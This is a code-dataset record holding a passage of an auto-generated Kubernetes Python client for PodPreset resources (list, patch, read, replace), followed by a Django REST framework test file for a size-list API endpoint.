:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_pod_preset_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_pod_preset_for_all_namespaces_with_http_info(**kwargs)
return data
def list_pod_preset_for_all_namespaces_with_http_info(self, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_pod_preset_for_all_namespaces_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_pod_preset_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/podpresets'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPresetList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_pod_preset(self, name, namespace, body, **kwargs):
"""
partially update the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_namespaced_pod_preset(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_pod_preset_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_namespaced_pod_preset_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_pod_preset(self, name, namespace, **kwargs):
"""
read the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_namespaced_pod_preset(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_pod_preset_with_http_info(self, name, namespace, **kwargs):
"""
read the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_namespaced_pod_preset_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_pod_preset(self, name, namespace, body, **kwargs):
"""
replace the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_namespaced_pod_preset(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_pod_preset_with_http_info(self, name, namespace, body, **kwargs):
"""
replace the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_namespaced_pod_preset_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
skuda/client-python
|
kubernetes/client/apis/settings_v1alpha1_api.py
|
Python
|
apache-2.0
| 58,259
|
from rest_framework.test import APITestCase, APIRequestFactory,\
force_authenticate
from api.v2.views import SizeViewSet
from api.tests.factories import ProviderFactory, UserFactory,\
AnonymousUserFactory, SizeFactory, IdentityFactory
from django.core.urlresolvers import reverse
from core.models import Size
class GetSizeListTests(APITestCase):
def setUp(self):
self.anonymous_user = AnonymousUserFactory()
self.user = UserFactory.create()
self.provider = ProviderFactory.create()
self.user_identity = IdentityFactory.create_identity(
created_by=self.user,
provider=self.provider)
self.size = SizeFactory.create(provider=self.provider,
cpu=10,
disk=20,
root=0,
mem=126)
self.view = SizeViewSet.as_view({'get': 'list'})
factory = APIRequestFactory()
url = reverse('api:v2:size-list')
self.request = factory.get(url)
def test_is_public(self):
force_authenticate(self.request, user=self.anonymous_user)
response = self.view(self.request)
self.assertEquals(response.status_code, 200)
def test_response_is_paginated(self):
force_authenticate(self.request, user=self.user)
response = self.view(self.request)
self.assertEquals(response.data['count'], 1)
self.assertEquals(len(response.data.get('results')), 1)
def test_response_contains_expected_fields(self):
force_authenticate(self.request, user=self.user)
response = self.view(self.request)
data = response.data.get('results')[0]
self.assertEquals(response.status_code, 200)
self.assertEquals(len(data), 13, "Number of fields does not match")
self.assertEquals(data['id'], self.size.id)
self.assertIn('url', data)
self.assertEquals(data['name'], self.size.name)
self.assertEquals(data['alias'], self.size.alias)
self.assertIn('uuid', data)
self.assertIn('cpu', data)
self.assertIn('disk', data)
self.assertIn('root', data)
self.assertIn('mem', data)
self.assertIn('active', data)
self.assertIn('provider', data)
self.assertIn('start_date', data)
self.assertIn('end_date', data)
|
CCI-MOC/GUI-Backend
|
api/tests/v2/test_sizes.py
|
Python
|
apache-2.0
| 2,409
|